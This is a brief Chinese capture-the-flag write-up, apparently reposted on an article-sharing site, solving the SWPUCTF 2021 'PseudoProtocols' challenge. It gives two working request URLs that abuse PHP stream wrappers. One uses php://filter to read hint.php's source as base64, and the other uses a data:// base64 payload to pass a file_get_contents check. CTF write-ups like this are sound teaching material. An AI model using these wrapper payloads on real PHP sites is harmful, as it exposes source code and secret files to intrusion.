[SWPUCTF 2021 新生赛]PseudoProtocols

本文主要是介绍[SWPUCTF 2021 新生赛]PseudoProtocols，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

看网址，里面有一个wllm=  这个我们可以再根据下面的提示，利用php伪协议；

http://1.14.71.254:28685/index.php?wllm=php://filter/read=convert.base64-encode/resource=hint.php

 将得到的数base64；

 得到提示，让我们去访问/test2222222222222.php

 就看到一堆的代码；a参数就是利用file_get_contents()函数只读形式打开，让它打开后内容要与"I want flag"字符串一样，才能继续执行下面的文件包含$file参数。再利用php伪协议中的data://协议。

http://1.14.71.254:28685/test2222222222222.php?a=data://text/plain;base64,SSB3YW50IGZsYWc=

 拿到flag

这个主要是利用了PHP伪协议;

周五摸摸鱼~~

这篇关于[SWPUCTF 2021 新生赛]PseudoProtocols的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！